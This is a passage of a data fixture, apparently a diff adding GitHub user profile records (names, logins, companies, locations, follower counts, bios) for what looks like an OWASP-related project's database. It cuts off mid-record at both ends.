"public_repositories_count": 5, + "created_at": "2016-01-05T09:40:11Z", + "updated_at": "2023-08-18T18:24:29Z", + "node_id": "MDQ6VXNlcjE2NTU1OTQ0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2901, + "fields": { + "nest_created_at": "2024-09-12T02:35:17.087Z", + "nest_updated_at": "2024-09-12T02:35:17.087Z", + "name": "Paweł Krawczyk", + "login": "kravietz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/616047?v=4", + "company": "Krawczyk Industries Limited", + "location": "Reading, UK", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 85, + "public_gists_count": 14, + "public_repositories_count": 63, + "created_at": "2011-02-13T18:51:29Z", + "updated_at": "2024-07-11T14:03:49Z", + "node_id": "MDQ6VXNlcjYxNjA0Nw==", + "bio": "Information security, DevOps and DevSecOps professional from Poland living in the UK", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2902, + "fields": { + "nest_created_at": "2024-09-12T02:35:21.293Z", + "nest_updated_at": "2024-09-12T02:35:21.293Z", + "name": "", + "login": "aaditriray", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16678049?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2016-01-13T03:23:43Z", + "updated_at": "2024-09-02T18:46:57Z", + "node_id": "MDQ6VXNlcjE2Njc4MDQ5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2903, + "fields": { + "nest_created_at": "2024-09-12T02:35:22.519Z", + "nest_updated_at": "2024-09-22T20:27:51.084Z", + "name": "Jacky", + "login": "jackycct", + "email": "jackycct@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11598320?v=4", + "company": "J.P. Morgan Chase", + "location": "Hong Kong", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2015-03-22T14:31:03Z", + "updated_at": "2024-09-14T11:33:31Z", + "node_id": "MDQ6VXNlcjExNTk4MzIw", + "bio": "Interested in machine learning and security", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2904, + "fields": { + "nest_created_at": "2024-09-12T02:35:39.616Z", + "nest_updated_at": "2024-09-12T02:35:39.616Z", + "name": "", + "login": "jtconsol", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50707283?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 3, + "created_at": "2019-05-16T13:46:25Z", + "updated_at": "2023-12-08T10:21:54Z", + "node_id": "MDQ6VXNlcjUwNzA3Mjgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2905, + "fields": { + "nest_created_at": "2024-09-12T02:35:41.723Z", + "nest_updated_at": "2024-09-12T02:35:42.128Z", + "name": "Simon Sobisch", + "login": "GitMensch", + "email": "simonsobisch@web.de", + "avatar_url": "https://avatars.githubusercontent.com/u/6699539?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 50, + "public_gists_count": 2, + "public_repositories_count": 87, + "created_at": "2014-02-16T23:12:27Z", + "updated_at": "2024-08-28T11:29:55Z", + "node_id": "MDQ6VXNlcjY2OTk1Mzk=", + "bio": "at day being either at work or with my kids, hacking free software, especially GnuCOBOL - https://www.gnu.org/software/gnucobol", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2906, + "fields": { + "nest_created_at": "2024-09-12T02:35:46.211Z", + "nest_updated_at": "2024-09-12T02:35:46.211Z", + "name": "", + "login": "hbroeder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28145756?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-04-28T12:11:39Z", + "updated_at": "2023-02-14T12:31:14Z", + "node_id": "MDQ6VXNlcjI4MTQ1NzU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2907, + "fields": { + "nest_created_at": "2024-09-12T02:35:48.238Z", + "nest_updated_at": "2024-09-12T02:35:48.238Z", + "name": "Aaron Tagliaboschi", + "login": "amtunlimited", + "email": "aaron.tagliaboschi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1744426?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2012-05-16T04:30:40Z", + "updated_at": "2024-08-12T02:26:24Z", + "node_id": "MDQ6VXNlcjE3NDQ0MjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2908, + "fields": { + "nest_created_at": "2024-09-12T02:35:58.101Z", + "nest_updated_at": "2024-09-12T02:35:58.101Z", + "name": "", + "login": "wangyun2018", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39397318?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-05-18T05:18:36Z", + "updated_at": "2024-02-22T08:51:19Z", + "node_id": "MDQ6VXNlcjM5Mzk3MzE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2909, + "fields": { + "nest_created_at": "2024-09-12T02:36:01.389Z", + "nest_updated_at": "2024-09-22T20:27:47.541Z", + "name": "Zac Spitzer", + "login": "zspitzer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/426404?v=4", + "company": "Pixl8", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 54, + "followers_count": 36, + "public_gists_count": 7, + "public_repositories_count": 83, + "created_at": "2010-10-04T12:39:28Z", + "updated_at": "2024-09-20T11:23:44Z", + "node_id": "MDQ6VXNlcjQyNjQwNA==", + "bio": "Community Manager @lucee ", + "is_hireable": false, + "twitter_username": "zackster" + } +}, +{ + "model": "github.user", + "pk": 2910, + "fields": { + "nest_created_at": "2024-09-12T02:36:03.911Z", + "nest_updated_at": "2024-09-12T02:36:03.911Z", + "name": "Aakash Pawar", + "login": "Aakash4396", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87015441?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-07-06T11:02:14Z", + "updated_at": "2024-09-04T15:14:21Z", + "node_id": "MDQ6VXNlcjg3MDE1NDQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2911, + "fields": { + "nest_created_at": "2024-09-12T02:36:04.737Z", + "nest_updated_at": "2024-09-12T02:36:04.737Z", + "name": "Jerry Devis", + "login": "JerryDevis", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89641128?v=4", + "company": "", + "location": "Earth", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2021-08-27T11:27:01Z", + "updated_at": "2024-07-23T15:24:32Z", + "node_id": "MDQ6VXNlcjg5NjQxMTI4", + "bio": "Trusted Computing\r\nCryptography", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2912, + "fields": { + "nest_created_at": "2024-09-12T02:36:12.196Z", + "nest_updated_at": "2024-09-12T02:36:12.196Z", + "name": "David M. Karr", + "login": "davidmichaelkarr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5566419?v=4", + "company": "AT&T", + "location": "Redmond, WA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 2, + "public_repositories_count": 30, + "created_at": "2013-09-28T21:48:40Z", + "updated_at": "2024-08-28T23:58:44Z", + "node_id": "MDQ6VXNlcjU1NjY0MTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2913, + "fields": { + "nest_created_at": "2024-09-12T02:36:13.464Z", + "nest_updated_at": "2024-09-12T02:36:13.464Z", + "name": "Björn Müller", + "login": "nettermensch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8876996?v=4", + "company": "CaptainCasa GmbH", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-09-23T13:56:01Z", + "updated_at": "2022-10-13T05:01:30Z", + "node_id": "MDQ6VXNlcjg4NzY5OTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2914, + "fields": { + "nest_created_at": "2024-09-12T02:36:17.132Z", + "nest_updated_at": "2024-09-12T02:36:17.132Z", + "name": "", + "login": "SalmanMohammedTR", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/85247740?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-06-02T16:40:36Z", + "updated_at": "2024-09-04T05:14:10Z", + "node_id": "MDQ6VXNlcjg1MjQ3NzQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2915, + "fields": { + "nest_created_at": "2024-09-12T02:36:30.564Z", + "nest_updated_at": "2024-09-12T02:36:30.564Z", + "name": "Rodolfo Ferreira", + "login": "RodolfoAndre", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6514867?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-01-27T14:05:51Z", + "updated_at": "2023-11-21T01:12:55Z", + "node_id": "MDQ6VXNlcjY1MTQ4Njc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2916, + "fields": { + "nest_created_at": "2024-09-12T02:36:31.764Z", + "nest_updated_at": "2024-09-12T02:36:31.764Z", + "name": "", + "login": "mukesh4804", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43472985?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-09-21T12:54:14Z", + "updated_at": "2023-09-06T09:56:16Z", + "node_id": "MDQ6VXNlcjQzNDcyOTg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2917, + "fields": { + "nest_created_at": "2024-09-12T02:36:35.816Z", + "nest_updated_at": "2024-09-12T02:36:35.816Z", + "name": "Priyatama", + "login": "PriyatamaB", + "email": "patilpriyatama77@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20452358?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-07-14T05:30:03Z", + "updated_at": "2024-05-02T11:48:57Z", + "node_id": "MDQ6VXNlcjIwNDUyMzU4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2918, + "fields": { + "nest_created_at": "2024-09-12T02:36:37.083Z", + "nest_updated_at": "2024-09-22T20:27:47.218Z", + "name": "", + "login": "mickeyz07", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32490762?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2017-10-03T15:47:33Z", + "updated_at": "2024-07-30T13:38:05Z", + "node_id": "MDQ6VXNlcjMyNDkwNzYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2919, + "fields": { + "nest_created_at": "2024-09-12T02:36:38.730Z", + "nest_updated_at": "2024-09-22T20:27:52.663Z", + "name": "Dario Viva", + "login": "DarioViva42", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45972949?v=4", + "company": "", + "location": "Basel, CH", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2018-12-18T14:58:40Z", + "updated_at": "2024-09-02T13:02:40Z", + "node_id": "MDQ6VXNlcjQ1OTcyOTQ5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2920, + "fields": { + "nest_created_at": "2024-09-12T02:36:55.727Z", + "nest_updated_at": "2024-09-12T02:36:55.727Z", + "name": "Iliyan Peychev", + "login": "ipeychev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78014?v=4", + "company": "@liferay ", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 122, + "public_gists_count": 23, + "public_repositories_count": 94, + "created_at": "2009-04-26T15:15:30Z", + "updated_at": "2024-08-22T08:40:22Z", + "node_id": "MDQ6VXNlcjc4MDE0", + "bio": "Head of Engineering at Liferay Cloud Division. Worked in the area of Software Engineering the last 20+ years. Creator of several Open Source projects.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2921, + "fields": { + "nest_created_at": "2024-09-12T02:37:01.427Z", + "nest_updated_at": "2024-09-12T02:37:01.427Z", + "name": "David S Morse", + "login": "dsmorse", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7193328?v=4", + "company": "", + "location": "Colorado Springs, CO", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 11, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2014-04-06T02:30:51Z", + "updated_at": "2024-08-30T00:57:10Z", + "node_id": "MDQ6VXNlcjcxOTMzMjg=", + "bio": "", + "is_hireable": false, + "twitter_username": "ds_morse" + } +}, +{ + "model": "github.user", + "pk": 2922, + "fields": { + "nest_created_at": "2024-09-12T02:37:02.689Z", + "nest_updated_at": "2024-09-22T20:28:03.186Z", + "name": "", + "login": "SamuraiWTF", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17264440?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 40, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2016-02-16T04:03:32Z", + "updated_at": "2018-09-21T21:04:03Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjE3MjY0NDQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2923, + "fields": { + "nest_created_at": "2024-09-12T02:37:05.919Z", + "nest_updated_at": "2024-09-22T20:28:07.758Z", + "name": "Mic", + "login": "mgillam", + "email": "mic@secureideas.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4037926?v=4", + "company": "Secure Ideas", + "location": "Kingston, ON", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 29, + "public_gists_count": 2, + "public_repositories_count": 13, + "created_at": "2013-04-02T14:38:51Z", + "updated_at": "2024-02-28T15:09:07Z", + "node_id": "MDQ6VXNlcjQwMzc5MjY=", + "bio": "Application security consultant with a focus on developer education.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2924, + "fields": { + "nest_created_at": "2024-09-12T02:37:11.985Z", + "nest_updated_at": "2024-09-22T20:28:08.406Z", + "name": "Cory Sabol", + "login": "corysabol", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4594324?v=4", + "company": "@secureideasllc @ProfessionallyEvil @NiceDuckGames", + "location": "", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 31, + "public_gists_count": 6, + "public_repositories_count": 72, + "created_at": "2013-06-02T17:55:57Z", + "updated_at": "2024-09-11T10:37:51Z", + "node_id": "MDQ6VXNlcjQ1OTQzMjQ=", + "bio": "Senior Security Consultant. I like to pretend that I design games in my spare time.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2925, + "fields": { + "nest_created_at": "2024-09-12T02:37:13.593Z", + "nest_updated_at": "2024-09-22T20:28:07.135Z", + "name": "Jason", + "login": "JGillam", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5461356?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 86, + "public_gists_count": 1, + "public_repositories_count": 24, + "created_at": "2013-09-15T02:40:52Z", + "updated_at": "2024-09-11T20:00:31Z", + "node_id": "MDQ6VXNlcjU0NjEzNTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2926, + "fields": { + "nest_created_at": "2024-09-12T02:37:13.986Z", + "nest_updated_at": "2024-09-22T20:28:08.093Z", + "name": "", + "login": "elreydetoda", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10230166?v=4", + "company": "@ProfessionallyEvil, @SamuraiWTF, @secureideasllc", + "location": "th3 Interw3bz", + "collaborators_count": 0, + "following_count": 66, + "followers_count": 70, + "public_gists_count": 34, + "public_repositories_count": 132, + "created_at": "2014-12-18T08:11:19Z", + "updated_at": "2024-09-15T19:54:47Z", + "node_id": "MDQ6VXNlcjEwMjMwMTY2", + "bio": "former member of @49thSecurityDivision and now work as PentesterOps/Developer at @secureideasllc\r\n\r\nmessage me at twitter: https://twitter.com/RonJonArod", + "is_hireable": false, + "twitter_username": "RonJonArod" + } +}, +{ + "model": "github.user", + "pk": 2927, + "fields": { + "nest_created_at": "2024-09-12T02:37:26.347Z", + "nest_updated_at": "2024-09-13T05:03:35.622Z", + "name": "x0341", + "login": "x0341", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1771943?v=4", + "company": "", + "location": "Around", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 6, + "public_gists_count": 17, + "public_repositories_count": 159, + "created_at": "2012-05-23T23:03:55Z", + "updated_at": "2024-09-09T18:15:01Z", + "node_id": "MDQ6VXNlcjE3NzE5NDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2928, + "fields": { + "nest_created_at": "2024-09-12T02:37:27.221Z", + "nest_updated_at": "2024-09-12T02:37:27.221Z", + "name": "", + "login": "jcrew99", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37361441?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2018-03-14T06:51:26Z", + "updated_at": "2023-12-27T03:31:26Z", + "node_id": "MDQ6VXNlcjM3MzYxNDQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2929, + "fields": { + "nest_created_at": "2024-09-12T02:37:28.053Z", + "nest_updated_at": "2024-09-12T02:37:28.053Z", + "name": "", + "login": "lekalmouk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53940979?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-08-09T12:10:57Z", + "updated_at": "2023-03-07T15:20:04Z", + "node_id": "MDQ6VXNlcjUzOTQwOTc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2930, + "fields": { + "nest_created_at": "2024-09-12T02:37:28.877Z", + "nest_updated_at": "2024-09-12T02:37:28.877Z", + "name": "Aaron Moss", + "login": "Bl0ckbuster", + "email": "kerrjar@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12902666?v=4", + "company": "Secure Ideas", + "location": "Tulsa, OK", + "collaborators_count": 0, + "following_count": 51, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2015-06-15T22:16:44Z", + "updated_at": "2024-09-10T02:32:03Z", + "node_id": "MDQ6VXNlcjEyOTAyNjY2", + "bio": "Senior Consultant @ Secure Ideas", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2931, + "fields": { + "nest_created_at": "2024-09-12T02:37:29.685Z", + "nest_updated_at": "2024-09-12T02:37:29.685Z", + "name": "Daniel Lopez", + "login": "Verdoso", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5923466?v=4", + "company": "", + "location": "Illes Balears, Spain", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 9, + "public_gists_count": 50, + "public_repositories_count": 26, + "created_at": "2013-11-12T21:24:52Z", + "updated_at": "2024-08-16T15:02:57Z", + "node_id": "MDQ6VXNlcjU5MjM0NjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "greeneyed_dlj" + } +}, +{ + "model": "github.user", + "pk": 2932, + "fields": { + "nest_created_at": "2024-09-12T02:37:30.963Z", + "nest_updated_at": "2024-09-22T20:28:07.445Z", + "name": "Kevin Johnson", + "login": "secureideas", + "email": "kevin@secureideas.com", + "avatar_url": "https://avatars.githubusercontent.com/u/544854?v=4", + "company": "Secure Ideas", + "location": "Orange Park, FL", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 40, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2011-01-03T03:08:00Z", + "updated_at": "2024-07-02T21:35:35Z", + "node_id": "MDQ6VXNlcjU0NDg1NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2933, + "fields": { + "nest_created_at": "2024-09-12T02:37:40.420Z", + "nest_updated_at": "2024-09-22T20:28:20.374Z", + "name": "", + "login": "Risk-Assessment-Framework", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63029581?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-04-02T02:08:35Z", + "updated_at": "2020-04-29T21:03:20Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjYzMDI5NTgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2934, + "fields": { + "nest_created_at": "2024-09-12T02:37:43.513Z", + "nest_updated_at": "2024-09-22T20:28:14.779Z", + "name": "JUHIE", + "login": "juhiechandra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75068056?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 266, + "followers_count": 136, + "public_gists_count": 0, + "public_repositories_count": 86, + "created_at": "2020-11-26T08:58:55Z", + "updated_at": "2024-09-10T05:57:47Z", + "node_id": "MDQ6VXNlcjc1MDY4MDU2", + "bio": "", + "is_hireable": true, + "twitter_username": "CerulianJ" + } +}, +{ + "model": "github.user", + "pk": 2935, + "fields": { + "nest_created_at": "2024-09-12T02:37:57.397Z", + "nest_updated_at": "2024-09-22T20:28:38.483Z", + "name": "Viktor Solovev", + "login": "dreddsa5dies", + "email": "viktor.vladimirovich.solovev@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2690403?v=4", + "company": "", + "location": "Moscow", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 266, + "public_gists_count": 1, + "public_repositories_count": 36, + "created_at": "2012-10-31T10:34:43Z", + "updated_at": "2024-09-19T11:28:37Z", + "node_id": "MDQ6VXNlcjI2OTA0MDM=", + "bio": "Life, Liberty and the Pursuit of Happiness", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2936, + "fields": { + "nest_created_at": "2024-09-12T02:38:02.841Z", + "nest_updated_at": "2024-09-22T20:29:21.453Z", + "name": "Saeed Dehqan", + "login": "saeeddhqan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31902891?v=4", + "company": "OWASP", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 111, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2017-09-12T20:24:27Z", + "updated_at": "2024-08-27T10:58:56Z", + "node_id": "MDQ6VXNlcjMxOTAyODkx", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2937, + "fields": { + "nest_created_at": "2024-09-12T02:38:15.502Z", + "nest_updated_at": "2024-09-22T20:29:29.661Z", + "name": "OWASP Find Security Bugs", + "login": "find-sec-bugs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16162781?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 24, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2015-12-05T06:50:49Z", + "updated_at": "2019-03-28T21:52:11Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjE2MTYyNzgx", + "bio": "The SpotBugs plugin for security audits of Java web applications and Android applications", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2938, + "fields": { + "nest_created_at": "2024-09-12T02:38:19.449Z", + "nest_updated_at": "2024-09-22T19:27:45.213Z", + "name": "Jesse Glick", + "login": "jglick", + "email": "jglick@cloudbees.com", + "avatar_url": "https://avatars.githubusercontent.com/u/154109?v=4", + "company": "@cloudbees", + "location": "Chapel Hill NC", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 448, + "public_gists_count": 36, + "public_repositories_count": 554, + "created_at": "2009-11-16T23:06:38Z", + "updated_at": "2024-09-05T18:23:54Z", + "node_id": "MDQ6VXNlcjE1NDEwOQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "tyvole" + } +}, +{ + "model": "github.user", + "pk": 2939, + "fields": { + "nest_created_at": "2024-09-12T02:38:22.281Z", + "nest_updated_at": "2024-09-12T02:38:22.281Z", + "name": "Archimedes Trajano", + "login": "trajano", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110627?v=4", + "company": "Trajano", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 55, + "public_gists_count": 24, + "public_repositories_count": 278, + "created_at": "2009-07-31T14:04:49Z", + "updated_at": "2024-09-10T21:50:46Z", + "node_id": "MDQ6VXNlcjExMDYyNw==", + "bio": "My direct e-mail is arch AT trajano DOT net", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2940, + "fields": { + "nest_created_at": "2024-09-12T02:38:26.828Z", + "nest_updated_at": "2024-09-22T20:29:53.899Z", + "name": "Adam Gabryś", + "login": "agabrys", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10604335?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 15, + "public_gists_count": 6, + "public_repositories_count": 29, + "created_at": "2015-01-19T21:26:13Z", + "updated_at": "2024-09-18T09:32:36Z", + "node_id": "MDQ6VXNlcjEwNjA0MzM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2941, + "fields": { + "nest_created_at": "2024-09-12T02:38:30.099Z", + "nest_updated_at": "2024-09-12T02:38:30.099Z", + "name": "Christoph Kutzinski", + "login": "kutzi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/175061?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 21, + "public_gists_count": 3, + "public_repositories_count": 49, + "created_at": "2010-01-01T19:50:38Z", + "updated_at": "2024-08-09T14:35:33Z", + "node_id": "MDQ6VXNlcjE3NTA2MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2942, + "fields": { + "nest_created_at": "2024-09-12T02:38:32.150Z", + "nest_updated_at": "2024-09-22T20:29:41.582Z", + "name": "Mike Kienenberger", + "login": "mkienenb", + "email": "mkienenb@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6233921?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 7, + "public_repositories_count": 39, + "created_at": "2013-12-20T23:31:47Z", + "updated_at": "2024-06-28T14:38:56Z", + "node_id": "MDQ6VXNlcjYyMzM5MjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2943, + "fields": { + "nest_created_at": "2024-09-12T02:38:33.744Z", + "nest_updated_at": "2024-09-12T02:38:33.744Z", + "name": "Jens Borgland", + "login": "jborgland", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1174079?v=4", + "company": "", + "location": "Gothenburg", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2011-11-05T09:26:39Z", + "updated_at": "2024-08-30T11:04:29Z", + "node_id": "MDQ6VXNlcjExNzQwNzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2944, + "fields": { + "nest_created_at": "2024-09-12T02:38:41.976Z", + "nest_updated_at": "2024-09-22T20:29:34.264Z", + "name": "Maxime Nadeau", + "login": "MaxNad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3847037?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 39, + "public_gists_count": 6, + "public_repositories_count": 18, + "created_at": "2013-03-12T20:46:39Z", + "updated_at": "2024-09-16T11:27:10Z", + "node_id": "MDQ6VXNlcjM4NDcwMzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2945, + "fields": { + "nest_created_at": 